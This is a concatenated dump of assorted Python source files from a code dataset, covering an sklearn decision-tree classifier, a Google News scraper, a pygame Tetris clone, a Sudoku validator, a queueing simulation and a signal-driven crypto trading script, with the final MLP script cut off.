LabelEncoder()\ny_converted = l_enc.fit_transform(y_converted)\n\nfrom sklearn.model_selection import train_test_split\n\n# divide a classe em teste 20% e treino 80%\nX_train, X_test, y_train, y_test = train_test_split(X, y_converted, test_size=0.2, random_state=1, stratify=y)\n\n# árvore de decisão\nfrom sklearn import tree\nclf = tree.DecisionTreeClassifier(criterion='entropy', splitter='random')\n\n# treina o modelo\nclf = clf.fit(X_train, y_train)\n\n# salva os resultados da classificação dos testes\ny_pred = clf.predict(X_test) \n\n# acurácia\nfrom sklearn.metrics import accuracy_score\nprint('Acurácia: ', round(accuracy_score(y_test,y_pred),2)) \n\n# matriz de confusao\nfrom sklearn.metrics import confusion_matrix\nprint('Matriz de confusão: \\n', confusion_matrix(y_test, y_pred))\n\n# sensibilidade\ntp, fp, fn, tn = confusion_matrix(y_test, y_pred).ravel()\nsensibility = tn / (tn+fn)\nprint('Sensibilidade: ', round(sensibility,2))\n\n# especificidade\nspecificity = tn / (tn+fp)\nprint('Especificidade: ', round(specificity, 2))","sub_path":"tree_cancer.py","file_name":"tree_cancer.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"285872385","text":"# http://www.checkio.org\n# Common Words\n# Mar 17, 2016\n# Robert Monahan\n\ndef words_in_common(a, b):\n\ta = a.split(',')\n\tb = b.split(',')\n\n\tcommon = []\n\tfor word_a in a:\n\t\tfor word_b in b:\n\t\t\tif word_a == word_b:\n\t\t\t\tcommon.append(word_a)\n\n\treturn ','.join(sorted(common))\n\n\nwords_in_common(\"hello,world\", \"hello,earth\")\t# \"hello\"\nwords_in_common(\"one,two,three\", \"four,five,six\")\t# \"\"\nwords_in_common(\"one,two,three\", \"four,five,one,two,six,three\")\t# \"one,three,two\"\n\n \n\n","sub_path":"elementary/common_words.py","file_name":"common_words.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"264848165","text":"import math\nimport random\nimport numpy\nimport math\nfrom scipy import stats\nimport sys\n# global parameter\n\n\n'''\nclient's request's arrival time\nexponential distribution with 0.85 request rate\n+ uniform distribution random number \n'''\n\n\ndef next_arrival_time(rateParameter):\n return (-math.log(1.0 - random.random()) / rateParameter) + random.uniform(\n 0.05, 0.25)\n\n\ndef pp_service_time(selected_number):\n return -math.log(1.0 - random.random()) / ( NUMBER_OF_SERVERS/\n selected_number\n )\n\n\nclass server_service(stats.rv_continuous):\n\n def _pdf(self, x):\n\n return (1 / (NUMBER_OF_SELECTED**\n (1.65 * 2.08))) * (2.08 * (10.3846**2.08) / (x**3.08))\n\n\ndef mean_response_time(n):\n NUMBER_OF_SELECTED = n\n request = []\n pp = []\n server_time = []\n server_index = []\n ss = server_service(a=10.3846 / (NUMBER_OF_SELECTED**1.65),\n b=math.inf,\n name='my_pdf')\n pre_arrival = 0\n for i in range(NUMBER_OF_REQUEST):\n tmp = next_arrival_time(REQUEST_RATE)\n request.append(pre_arrival + tmp)\n pre_arrival += tmp\n tmp = pp_service_time(NUMBER_OF_SELECTED)\n pp.append(tmp)\n server_time.append([])\n for k in range(NUMBER_OF_SERVERS):\n server_time[i].append(0)\n server_index.append([])\n for j in range(NUMBER_OF_SELECTED):\n tmp = ss.rvs()\n while (True):\n s_tmp = random.randint(1, NUMBER_OF_SERVERS) - 1\n if s_tmp not in server_index[i]:\n break\n server_time[i][s_tmp] = tmp\n server_index[i].append(s_tmp)\n\n pp_finished = []\n server_finised = []\n response_time = []\n for i in range(NUMBER_OF_REQUEST):\n pp_finished.append([])\n server_finised.append([])\n for k in range(NUMBER_OF_SERVERS):\n server_finised[i].append(0)\n\n '''\n calculate finish time of each preprocessor\n based on request time and preprocessor's service time\n '''\n\n if i == 0:\n pp_finished[i] = request[i] + pp[i]\n max = 0\n for j in server_index[i]:\n server_finised[i][j] = pp_finished[i] + server_time[i][j]\n if server_finised[i][j] > max:\n max = server_finised[i][j]\n response_time.append(max - request[i])\n continue\n\n if request[i] < pp_finished[i-1]:\n pp_finished[i] = pp_finished[i-1] + pp[i]\n else:\n pp_finished[i] = request[i] + pp[i]\n\n max = 0\n for j in server_index[i]:\n if pp_finished[i] > server_finised[i-1][j]:\n server_finised[i][j] = pp_finished[i] + server_time[i][j]\n else:\n server_finised[i][j] = server_finised[i-1][j] + server_time[i][j]\n if server_finised[i][j] > max:\n max = server_finised[i][j]\n response_time.append(max - request[i])\n\n return sum(each_res for each_res in response_time) / NUMBER_OF_REQUEST\n\n\nif __name__ == '__main__':\n\n NUMBER_OF_SERVERS = 10\n selected_list = range(1, 11)\n\n\n SEED = 1000\n random.seed(SEED)\n numpy.random.seed(SEED)\n REQUEST_RATE = 0.85\n\n with open(\"result.txt\", 'w') as file:\n for each_select in selected_list:\n mean_resp = []\n NUMBER_OF_SELECTED = each_select\n\n print('selected server' 'number is ' + str(NUMBER_OF_SELECTED))\n file.write('selected server number is ' + str(NUMBER_OF_SELECTED)+'\\n')\n print('number_of_request mean_response_time')\n file.write('number_of_request mean_response_time\\n')\n request_list = [500, 1000, 1500, 2000, 2500]\n for i in request_list:\n NUMBER_OF_REQUEST = i\n # mean_response_time(i)\n tmp = mean_response_time(NUMBER_OF_SELECTED)\n mean_resp.append(tmp)\n file.write('{:17s} {:18s}\\n'.format(str(NUMBER_OF_REQUEST), str(tmp)))\n print('{:17s} {:18s}\\n'.format(str(NUMBER_OF_REQUEST), str(tmp)))\n\n file.write('mean value for five replications: ' + str(numpy.average(mean_resp)) + '\\n')\n file.write('standard deviation for five replications: ' + str(numpy.std(mean_resp)) + '\\n\\n\\n')\n print('mean value for five replications: ', numpy.average(mean_resp))\n print('standard deviation for five replications: ', numpy.std(mean_resp))\n\n\n","sub_path":"2016s1/cs9334/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"214946853","text":"from __future__ import print_function\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef forge_url(q, start):\n return 'https://www.google.co.jp/search?q={}&hl=en&tbm=nws&start={}'.format(q.replace(' ', '+'), start)\n\n\ndef index(str1, pattern):\n \"\"\" because '&'.index(str) did not work for HTML strings!\"\"\"\n N = len(pattern)\n for i in range(0, len(str1) - N):\n if str1[i:i + N] == pattern:\n return i\n return -1\n\n\n# extract timestamp : \ndef extract_links(content):\n soup = BeautifulSoup(content, 'html.parser')\n links = [v.contents[0].attrs['href'][7:] for v in soup.find_all('h3', {\"class\": \"r\"})]\n links = [link[0:index(link, '&')] for link in links]\n dates = [v.string.split('-')[1] for v in soup.find_all('span', {\"class\": \"f\"}) if '-' in v.string]\n return links, dates\n\n\ndef run(q, limit=10):\n num_articles_index = 0\n while num_articles_index < limit:\n url = forge_url(q, num_articles_index)\n print('For Google -> {}'.format(url))\n response = requests.get(url)\n links, dates = extract_links(response.content)\n for i in range(len(links)):\n print('{} - {}'.format(links[i], dates[i]))\n num_articles_index += 10\n\n\nrun(q='Honda Factory', limit=40)\n","sub_path":"requests_test_2.py","file_name":"requests_test_2.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"560545754","text":"class Solution:\n def isValidSudoku(self, board: List[List[str]]) -> bool:\n for row in board:\n nums = [x for x in row if x != '.' ]\n if self.notValid(nums):\n return False\n \n for i in range(len(board[0])):\n col = [row[i] for row in board]\n nums = [x for x in col if x != '.' ]\n if self.notValid(nums):\n return False\n \n for i in [0, 3, 6]:\n for j in [0, 3, 6]:\n nums = [x for row in board[i:i+3] for x in row[j:j+3] if x != '.']\n if self.notValid(nums):\n return False\n return True\n \n def notValid(self, nums):\n return len(set(nums)) != len(nums)\n","sub_path":"36-Valid-Sudoku/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"162157447","text":"import pygame\nfrom pygame.locals import *\nfrom random import randint\n\npygame.init()\nSCREEN_SIZE = (640, 480)\nmain_screen = pygame.display.set_mode(SCREEN_SIZE, 0, 32)\n# key down\nROTATE_LEFT, ROTATE_RIGHT, TO_BOTTOM = range(3)\n# diamond size\nDIAMOND_SIZE = (20, 20)\n# color type\ndiamond_color_size = 6\nCOLOR_RED, COLOR_BLUE, COLOR_GREEN, COLOR_YELLOW, COLOR_BLACK, COLOR_NO_DIAMOND = range(\n diamond_color_size)\nCOLOR = {\n COLOR_RED: (255, 0, 0),\n COLOR_BLUE: (0, 0, 255),\n COLOR_GREEN: (0, 255, 0),\n COLOR_YELLOW: (255, 255, 0),\n COLOR_BLACK: (0, 0, 0),\n COLOR_NO_DIAMOND: (100, 100, 100),\n}\n\nCOLOR_DIAMOND = {\n COLOR_RED: pygame.surface.Surface(DIAMOND_SIZE).convert(),\n COLOR_BLUE: pygame.surface.Surface(DIAMOND_SIZE).convert(),\n COLOR_GREEN: pygame.surface.Surface(DIAMOND_SIZE).convert(),\n COLOR_YELLOW: pygame.surface.Surface(DIAMOND_SIZE).convert(),\n COLOR_BLACK: pygame.surface.Surface(DIAMOND_SIZE).convert(),\n COLOR_NO_DIAMOND: pygame.surface.Surface(DIAMOND_SIZE).convert(),\n}\n\n\n#\ndef draw_rect(lw, surface, rgb_color):\n rect = (lw, lw, DIAMOND_SIZE[0] - 2 * lw, DIAMOND_SIZE[1] - 2 * lw)\n pygame.draw.line(surface, rgb_color, (rect[0], rect[1]), (rect[0], rect[3]), lw)\n pygame.draw.line(surface, rgb_color, (rect[0], rect[1]), (rect[2], rect[1]), lw)\n pygame.draw.line(surface, rgb_color, (rect[0], rect[3]), (rect[2], rect[3]), lw)\n pygame.draw.line(surface, rgb_color, (rect[2], rect[1]), (rect[2], rect[3]), lw)\n return\n\n\nfor x in xrange(diamond_color_size):\n COLOR_DIAMOND[x].fill(COLOR[x])\n draw_rect(2, COLOR_DIAMOND[x], (128, 128, 128))\n\n# begin time\nclock = pygame.time.Clock()\n# GAME SCREEN SIZE\nGAME_SCREEN_SIZE = (10, 20)\nGAME_SCREEN_MID = GAME_SCREEN_SIZE[0] / 2\n# font\nuse_font = pygame.font.Font(\"FONT.TTF\", 16)\n# POINT\nSCORE_POINT = (250, 100)\nNEXT_DIAMOND_POINT = (12, 5)\nMOVING_DIAMOND_OUT_POINT = (GAME_SCREEN_MID, 0)\nSCREEN_MID_POINT = (GAME_SCREEN_SIZE[0]*DIAMOND_SIZE[0]/2, GAME_SCREEN_SIZE[1]*DIAMOND_SIZE[1]/2)\n\n\nclass World(object):\n def __init__(self, x, y, width, height):\n self.x = x\n self.y = y\n self.game_surface = use_font.render(\"game over. enter any key to restart.\", True\n , COLOR[COLOR_RED], COLOR[COLOR_BLUE])\n\n self.width = width\n self.height = height\n self.background = pygame.surface.Surface(\n (self.width * DIAMOND_SIZE[0] + 1, self.height * DIAMOND_SIZE[1] + 1)).convert()\n self.background.fill((200, 255, 200))\n self.no_diamond = COLOR_DIAMOND[COLOR_NO_DIAMOND]\n\n self.diamonds = {}\n self.diamond_id = 0\n self.init_diamonds()\n self.moving_diamond = self.create_diamond()\n self.moving_diamond.move_x(GAME_SCREEN_SIZE[0] / 2)\n self.next_diamond = self.create_diamond()\n self.next_diamond.move_x(NEXT_DIAMOND_POINT[0])\n self.game_over = False\n self.d_time = 0.\n self.score = 0\n self.score_surface = use_font.render(\"score: 0\", True, COLOR[COLOR_BLACK], COLOR[COLOR_BLUE])\n return\n\n def init_value(self):\n self.diamonds = {}\n self.diamond_id = 0\n self.init_diamonds()\n self.moving_diamond = self.create_diamond()\n self.moving_diamond.move_x(GAME_SCREEN_SIZE[0] / 2)\n self.next_diamond = self.create_diamond()\n self.next_diamond.move_x(NEXT_DIAMOND_POINT[0])\n self.d_time = 0.\n self.score = 0\n self.score_surface = use_font.render(\"score: 0\", True, COLOR[COLOR_BLACK], COLOR[COLOR_BLUE])\n self.game_over = False\n return\n\n def init_diamonds(self):\n for x in xrange(0, self.width):\n for y in xrange(0, self.height):\n self.diamonds[x, y] = None\n return\n\n def create_diamond(self):\n return Diamond(self)\n\n def process(self, process_time):\n if self.game_over:\n return\n self.d_time += process_time\n if self.d_time > 500.:\n self.d_time -= 500.\n if self.moving_diamond is None:\n self.moving_diamond = self.next_diamond\n self.moving_diamond.move_x(-NEXT_DIAMOND_POINT[0] + GAME_SCREEN_SIZE[0] / 2)\n self.next_diamond = self.create_diamond()\n self.next_diamond.move_x(NEXT_DIAMOND_POINT[0])\n return\n self.diamond_down()\n return\n\n def add_diamond_world(self, diamond):\n nodes = diamond.get_all_node()\n for k in nodes.keys():\n if nodes[k] is not None:\n self.diamonds[nodes[k].get_pos()] = nodes[k]\n self.moving_diamond = None\n self.erase()\n self.check_game()\n return\n\n def check_game(self):\n for x in xrange(0, self.width):\n if self.diamonds[x, 1] is not None:\n self.game_over = True\n return False\n return True\n\n def render_background(self, surface):\n surface.blit(self.background, (self.x, self.y))\n for x in xrange(self.width):\n for y in xrange(self.height):\n surface.blit(self.no_diamond, (self.x + x * DIAMOND_SIZE[0], self.y + y * DIAMOND_SIZE[1]))\n return\n\n def render(self, surface):\n self.render_background(surface)\n\n for diamond in self.diamonds.itervalues():\n if diamond is not None:\n diamond.render(surface)\n\n if self.moving_diamond:\n self.moving_diamond.render(surface)\n self.next_diamond.render(surface)\n\n surface.blit(self.score_surface, SCORE_POINT)\n if self.game_over:\n surface.blit(self.game_surface\n , (SCREEN_MID_POINT[0]-self.game_surface.get_width()/2+self.x\n , SCREEN_MID_POINT[1]-self.game_surface.get_height()/2+self.y))\n return\n\n def event_key_down(self, key):\n if self.game_over:\n self.init_value()\n return\n if K_LEFT == key:\n self.diamond_left()\n elif K_RIGHT == key:\n self.diamond_right()\n elif K_DOWN == key:\n self.diamond_down()\n elif K_UP == key:\n self.moving_diamond_rotate()\n return\n\n def moving_diamond_bottom(self):\n if self.moving_diamond is None:\n return\n self.moving_diamond.get_bottom()\n return\n\n def moving_diamond_rotate(self):\n if self.moving_diamond is None:\n return\n index = self.moving_diamond.get_next_rotate()\n for v in index.itervalues():\n if v[0] < 0 or v[0] >= self.width or v[1] >= self.height or self.diamonds[v] is not None:\n return\n self.moving_diamond.rotate()\n return\n\n def diamond_down(self):\n if self.moving_diamond is None:\n return\n bottom = self.moving_diamond.get_bottom()\n for i in bottom:\n next_pos = (bottom[i][0], bottom[i][1] + 1)\n if next_pos[1] >= self.height:\n self.add_diamond_world(self.moving_diamond)\n return\n if self.diamonds[next_pos] is not None:\n self.add_diamond_world(self.moving_diamond)\n return\n self.moving_diamond.move_y(1)\n return\n\n def diamond_left(self):\n if self.moving_diamond is None:\n return\n left = self.moving_diamond.get_left()\n for i in left:\n next_pos = (left[i][0] - 1, left[i][1])\n if next_pos[0] < 0 or self.diamonds[next_pos] is not None or self.width < next_pos[0]:\n return\n\n self.moving_diamond.move_x(-1)\n return\n\n def diamond_right(self):\n if self.moving_diamond is None:\n return\n left = self.moving_diamond.get_right()\n for i in left:\n next_pos = (left[i][0] + 1, left[i][1])\n if self.width <= next_pos[0] or self.diamonds[next_pos] is not None or next_pos[0] < 0:\n return\n self.moving_diamond.move_x(1)\n return\n\n def point_to_index(self, point):\n return (point[0] - self.x) / DIAMOND_SIZE[0], (point[1] - self.y) / DIAMOND_SIZE[1]\n\n def index_to_point(self, index):\n return index[0] * DIAMOND_SIZE[0] + self.x, index[1] * DIAMOND_SIZE[1] + self.y\n\n def erase(self):\n n = 0\n for line in xrange(0, self.height):\n if self.is_full(line):\n self.clear_line(line)\n n += 1\n self.drop_more_than_line(line)\n line -= 1\n self.score += n * n\n str = \"score: %d\" % self.score\n self.score_surface = use_font.render(str, True, COLOR[COLOR_BLACK], COLOR[COLOR_BLUE])\n return\n\n def drop_more_than_line(self, line):\n for y in xrange(0, line):\n for x in xrange(0, self.width):\n yy = line - y\n if self.diamonds[x, yy] is not None:\n self.diamonds[x, yy].move_y(1)\n self.diamonds[x, yy + 1] = self.diamonds[x, yy]\n self.diamonds[x, yy] = None\n return\n\n def is_full(self, y):\n for x in xrange(0, self.width):\n if self.diamonds[x, y] is None:\n return False\n return True\n\n def clear_line(self, y):\n for x in xrange(0, self.width):\n self.diamonds[x, y] = None\n return\n\n\nclass Node(object):\n def __init__(self, x, y, background, world):\n self.x = x\n self.y = y\n self.background = background\n self.world = world\n return\n\n def render(self, surface):\n surface.blit(self.background, (self.world.index_to_point((self.x, self.y))))\n return\n\n def move_x(self, x):\n self.x += x\n return\n\n def move_y(self, y):\n self.y += y\n return\n\n def get_pos(self):\n return self.x, self.y\n\n def get_x(self):\n return self.x\n\n def get_y(self):\n return self.y\n\n def set_pos(self, index):\n self.x = index[0]\n self.y = index[1]\n return\n\n\ndiamond_point_type_size = 7\ndiamond_point = {\n 0: {0: (0, 0), 1: (1, 0), 2: (0, 1), 3: (1, 1)},\n 1: {0: (0, 0), 1: (1, 0), 2: (2, 0), 3: (0, 1)},\n 2: {0: (0, 0), 1: (1, 0), 2: (2, 0), 3: (1, 1)},\n 3: {0: (0, 0), 1: (0, 1), 2: (0, 2), 3: (0, 3)},\n 4: {0: (0, 0), 1: (1, 0), 2: (2, 0), 3: (2, 1)},\n 5: {0: (0, 0), 1: (1, 0), 2: (1, 1), 3: (2, 1)},\n 6: {0: (1, 0), 1: (2, 0), 2: (0, 1), 3: (1, 1)},\n}\n\ndiamond_rotate_point = {\n 0: {0: {0: (0, 0), 1: (1, 0), 2: (0, 1), 3: (1, 1)}, #\n 1: {0: (0, 0), 1: (1, 0), 2: (0, 1), 3: (1, 1)},\n 2: {0: (0, 0), 1: (1, 0), 2: (0, 1), 3: (1, 1)},\n 3: {0: (0, 0), 1: (1, 0), 2: (0, 1), 3: (1, 1)},\n },\n 1: {0: {0: (0, 1), 1: (1, 1), 2: (2, 1), 3: (0, 2)}, # L\n 1: {0: (0, 0), 1: (1, 0), 2: (1, 1), 3: (1, 2)},\n 2: {0: (0, 1), 1: (1, 1), 2: (2, 1), 3: (2, 0)},\n 3: {0: (1, 0), 1: (1, 1), 2: (1, 2), 3: (2, 2)},\n },\n 2: {0: {0: (0, 1), 1: (1, 1), 2: (2, 1), 3: (1, 0)}, # T\n 1: {0: (1, 0), 1: (1, 1), 2: (1, 2), 3: (2, 1)},\n 2: {0: (0, 1), 1: (1, 1), 2: (2, 1), 3: (1, 2)},\n 3: {0: (1, 0), 1: (1, 1), 2: (1, 2), 3: (0, 1)},\n },\n 3: {0: {0: (1, 0), 1: (1, 1), 2: (1, 2), 3: (1, 3)}, # |\n 1: {0: (0, 1), 1: (1, 1), 2: (2, 1), 3: (3, 1)},\n 2: {0: (1, 0), 1: (1, 1), 2: (1, 2), 3: (1, 3)},\n 3: {0: (0, 1), 1: (1, 1), 2: (2, 1), 3: (3, 1)},\n },\n 4: {0: {0: (1, 0), 1: (1, 1), 2: (1, 2), 3: (2, 0)}, # !L\n 1: {0: (0, 1), 1: (1, 1), 2: (2, 1), 3: (2, 2)},\n 2: {0: (1, 0), 1: (1, 1), 2: (1, 2), 3: (0, 2)},\n 3: {0: (0, 1), 1: (1, 1), 2: (2, 1), 3: (0, 0)},\n },\n 5: {0: {0: (0, 0), 1: (1, 0), 2: (1, 1), 3: (2, 1)}, # Z\n 1: {0: (1, 0), 1: (1, 1), 2: (0, 1), 3: (0, 2)},\n 2: {0: (0, 0), 1: (1, 0), 2: (1, 1), 3: (2, 1)},\n 3: {0: (1, 0), 1: (1, 1), 2: (0, 1), 3: (0, 2)},\n },\n 6: {0: {0: (0, 1), 1: (1, 1), 2: (1, 0), 3: (2, 0)}, # !Z\n 1: {0: (0, 0), 1: (0, 1), 2: (1, 1), 3: (1, 2)},\n 2: {0: (0, 1), 1: (1, 1), 2: (1, 0), 3: (2, 0)},\n 3: {0: (0, 0), 1: (0, 1), 2: (1, 1), 3: (1, 2)},\n },\n}\n\n\nclass Diamond(object):\n def __init__(self, world):\n self.x = 0\n self.y = 0\n self.diamonds = {}\n self.diamonds_list = {}\n self.diamond_id = 0\n self.init_diamonds()\n self.world = world\n self.type = None\n self.create(world)\n self.rotate_time = 0\n return\n\n def init_diamonds(self):\n for x in xrange(0, 4):\n for y in xrange(0, 4):\n self.diamonds[x, y] = None\n return\n\n def create(self, world):\n self.type = randint(0, diamond_point_type_size - 1)\n rand_color = randint(0, 3)\n index = diamond_rotate_point[self.type][0]\n self.diamonds_list[0] = self.diamonds[index[0][0], index[0][1]] = Node(index[0][0], index[0][1],\n COLOR_DIAMOND[rand_color], world)\n self.diamonds_list[1] = self.diamonds[index[1][0], index[1][1]] = Node(index[1][0], index[1][1],\n COLOR_DIAMOND[rand_color], world)\n self.diamonds_list[2] = self.diamonds[index[2][0], index[2][1]] = Node(index[2][0], index[2][1],\n COLOR_DIAMOND[rand_color], world)\n self.diamonds_list[3] = self.diamonds[index[3][0], index[3][1]] = Node(index[3][0], index[3][1],\n COLOR_DIAMOND[rand_color], world)\n self.diamond_id = 4\n return\n\n def turn(self):\n if self.type == 0:\n return\n return\n\n def render(self, surface):\n for diamond in self.diamonds.itervalues():\n if diamond is not None:\n diamond.render(surface)\n return\n\n def move_x(self, x):\n for diamond in self.diamonds.itervalues():\n if diamond is not None:\n diamond.move_x(x)\n self.x += x\n return\n\n def move_to(self, pos):\n x = self.x - pos[0]\n y = self.y - pos[1]\n for diamond in self.diamonds.itervalues():\n if diamond is not None:\n diamond.move_x(x)\n diamond.move_x(x)\n return\n\n def move_y(self, y):\n for diamond in self.diamonds.itervalues():\n if diamond is not None:\n diamond.move_y(y)\n self.y += y\n return\n\n def get_left(self):\n left = {}\n for y in xrange(0, 4):\n for x in xrange(0, 4):\n if self.diamonds[3 - x, y] is not None:\n left[y] = self.diamonds[3 - x, y].get_pos()\n return left\n\n def get_right(self):\n right = {}\n for y in xrange(0, 4):\n for x in xrange(0, 4):\n if self.diamonds[x, y] is not None:\n right[y] = self.diamonds[x, y].get_pos()\n return right\n\n def get_bottom(self):\n bottom = {}\n for x in xrange(0, 4):\n for y in xrange(0, 4):\n if self.diamonds[x, y] is not None:\n bottom[x] = self.diamonds[x, y].get_pos()\n return bottom\n\n def get_all_node(self):\n return self.diamonds\n\n def get_next_rotate(self):\n c_index = diamond_rotate_point[self.type][(self.rotate_time + 1) % 4].copy()\n for k in c_index.keys():\n c_index[k] = (self.x + c_index[k][0], self.y + c_index[k][1])\n return c_index\n\n def rotate(self):\n self.rotate_time = (self.rotate_time + 1) % 4\n n = 0\n for x in xrange(0, 4):\n for y in xrange(0, 4):\n self.diamonds[x, y] = None\n for i in xrange(0, 4):\n new_pos = diamond_rotate_point[self.type][self.rotate_time][i]\n new_pos_now = (new_pos[0] + self.x, new_pos[1] + self.y)\n self.diamonds_list[i].set_pos(new_pos_now)\n self.diamonds[new_pos] = self.diamonds_list[i]\n return\n\n\nclass App(object):\n def __init__(self):\n self.screen = main_screen\n # background init\n self.background = pygame.surface.Surface(SCREEN_SIZE).convert()\n self.background.fill((255, 255, 255))\n # World init\n self.world = World(10, 10, GAME_SCREEN_SIZE[0], GAME_SCREEN_SIZE[1])\n self.create_world()\n return\n\n def create_world(self):\n self.world = World(10, 10, GAME_SCREEN_SIZE[0], GAME_SCREEN_SIZE[1])\n return\n\n def run(self):\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n return\n if event.type == KEYDOWN:\n if event.key == K_UP:\n self.world.event_key_down(event.key)\n\n pressed_keys = pygame.key.get_pressed()\n if pressed_keys[K_LEFT]:\n self.world.event_key_down(K_LEFT)\n if pressed_keys[K_RIGHT]:\n self.world.event_key_down(K_RIGHT)\n if pressed_keys[K_DOWN]:\n self.world.event_key_down(K_DOWN)\n\n self.render()\n time_passed = clock.tick(30)\n self.world.process(time_passed)\n self.world.render(self.screen)\n\n pygame.display.update()\n return\n\n def render(self):\n self.screen.blit(self.background, (0, 0))\n return\n\n\nif __name__ == \"__main__\":\n app = App()\n app.run()\n","sub_path":"game/diamond/diamond.py","file_name":"diamond.py","file_ext":"py","file_size_in_byte":17714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"110106071","text":"#Торговля по сигналам\nfrom func.main import *\n\nimport json\nwith open('data/set.txt', 'r', encoding='utf-8') as file:\n\ts = json.loads(file.read())['replacements']\n\tquant = s['volume']\n\ntrades = db['trade']\ntable = db['history']\n\ndef trade():\n#Первоначальные значения\n\ttry:\n\t\tnum = trades.find().sort('id', -1)[0]['id']\n\texcept:\n\t\tnum = 0\n\n\twhile True:\n\t\tx = [i for i in trades.find({'id': {'$gte': num+1}})]\n\n\t\tif len(x):\n\t\t\tnum = x[-1]['id']\n\n\t\tfor i in x:\n#Рассчёт основных параметров для биржи\n\t\t\tprice = i['realprice'] #чтобы не заморачиваться и каждый раз быстро вводить покупку\n\t\t\tif not price: continue #валюты нет\n\t\t\t#сделать проверку на объём валюты\n\n\t\t\tdelta = max(stock[i['exchanger']].info() * i['volume'], quant)\n\t\t\tdelta = min(delta, stock[i['exchanger']].min) #?время if delta < stock[i['exchanger']].min\n\t\t\tcount = delta / price\n\n\t\t\t#сделать проверку достаточно ли средств\n\n\t\t\ttime = strftime('%d.%m.%Y %H:%M:%S')\n\t\t\trub = stock[i['exchanger']].ru()\n\n#Покупка\n\t\t\tsucc = stock[i['exchanger']].trade(i['currency'], count, price, 2)\n\n\t\t\tsend('-' * 20)\n\t\t\tsend(i['mess'], forward=i['chat'])\n\n\t\t\tformated = 'Купить %s!\\n-----\\nК %.8f\\nɃ %.8f (%d₽)\\n∑ %.8f (%d₽)' % (currencies[i['currency']][1], count, price, price / rub, price * count, (price * count) / rub)\n\t\t\tsend(formated)\n\n\t\t\tif succ:\n\t\t\t\tsett = {'message': i['id'], 'success': 0, 'order': succ, 'type': 'buy', 'currency': i['currency'], 'exchanger': i['exchanger'], 'price': price, 'count': count, 'time': time, 'term': i['term']}\n\t\t\t\tprint(sett)\n\t\t\t\ttable.insert(sett)\n\n#Продажа\n\t\t\t\ttry:\n\t\t\t\t\tsu = 0\n\t\t\t\t\tx = []\n\t\t\t\t\tfor j in range(1, len(i['out']) + 1):\n\t\t\t\t\t\t#Если слишком маленький объём продажи\n\t\t\t\t\t\t#может ли быть такое, что все кроме первого объединятся, а первый будет слишком маленький\n\t\t\t\t\t\tpric = i['out'][-j][2] if i['out'][-j][1] else price * i['out'][-j][2]\n\t\t\t\t\t\tcoun = count * i['out'][-j][0]\n\t\t\t\t\t\tprint('!!!COUN!!!', coun * pric)\n\t\t\t\t\t\tif coun * pric < stock[i['exchanger']].min: #quant:\n\t\t\t\t\t\t\ti['out'][-1-j][0] += i['out'][-j][0]\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\tsu += coun * pric\n\n\t\t\t\t\t\tx.append({'message': i['id'], 'success': 0, 'order': 0, 'type': 'sell', 'currency': i['currency'], 'exchanger': i['exchanger'], 'price': pric, 'count': coun, 'time': time, 'processed': 0, 'term': i['term']})\n\n\t\t\t\t\tfor j in range(len(x)-1):\n\t\t\t\t\t\tx[j]['loss'] = 0\n\t\t\t\t\tx[len(x)-1]['loss'] = i['loss'][1] if i['loss'][0] else i['loss'][1] * price\n\n\t\t\t\texcept:\n\t\t\t\t\tpric = i['out'][0][2] if i['out'][0][1] else price * i['out'][0][2]\n\t\t\t\t\tsu = count * pric\n\t\t\t\t\tlost = i['loss'][1] if i['loss'][0] else i['loss'][1] * price\n\t\t\t\t\tx = {'message': i['id'], 'success': 0, 'order': 0, 'type': 'sell', 'currency': i['currency'], 'exchanger': i['exchanger'], 'price': pric, 'count': count, 'time': time, 'loss': lost, 'processed': 0, 'term': i['term'], 'numsell': 1}\n\t\t\t\t\ttable.insert(x)\n\n\t\t\t\telse:\n\t\t\t\t\tfor j in range(1, len(x)+1):\n\t\t\t\t\t\tx[-j]['numsell'] = j\n\t\t\t\t\t\ttable.insert(x[-j])\n\n#Худший - лучший случай\n\t\t\t\tvol = price * count\n\t\t\t\tloss = (price - i['loss'][1]) * count if i['loss'][0] else vol * (1 - i['loss'][1])\n\t\t\t\tformated = 'Худший случай: -%fɃ (-%d₽)\\nЛучший случай: +%fɃ (+%d₽)' % (loss, loss / rub, su - vol, (su - vol) / rub)\n\t\t\t\tsend(formated)\n\t\t\telse:\n\t\t\t\tprint('Ошибка покупки!\\n')\n\t\t\t\tsend('Ошибка покупки!')\n\t\t\tsend('-' * 20)\n\nif __name__ == '__main__':\n\ttrade()","sub_path":"trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"651832877","text":"# import numpy as np\n# import matplotlib.pyplot as plt\n# from sklearn.metrics import classification_report, confusion_matrix\n\n# from sklearn import svm\n# from sklearn.pipeline import make_pipeline\n# from sklearn.preprocessing import StandardScaler\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn_porter import Porter\n\nimport os, sys\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(parentdir)\nimport s_data_loader as data_loader\n# dt = data_loader.load_feature_time()\ndt = data_loader.load_feature()\n\n# Mapping table for classes\nlabels = dt.labels\nx_train = dt.x_train\ny_train = dt.y_train\nx_test = dt.x_test\ny_test = dt.y_test\n\n\nskip_ratio = 10\nrx_train = x_train[::skip_ratio]\nry_train = y_train[::skip_ratio]\nrx_test = x_test[::skip_ratio]\nry_test = y_test[::skip_ratio]\n\n\nmodel = MLPClassifier(activation='relu', 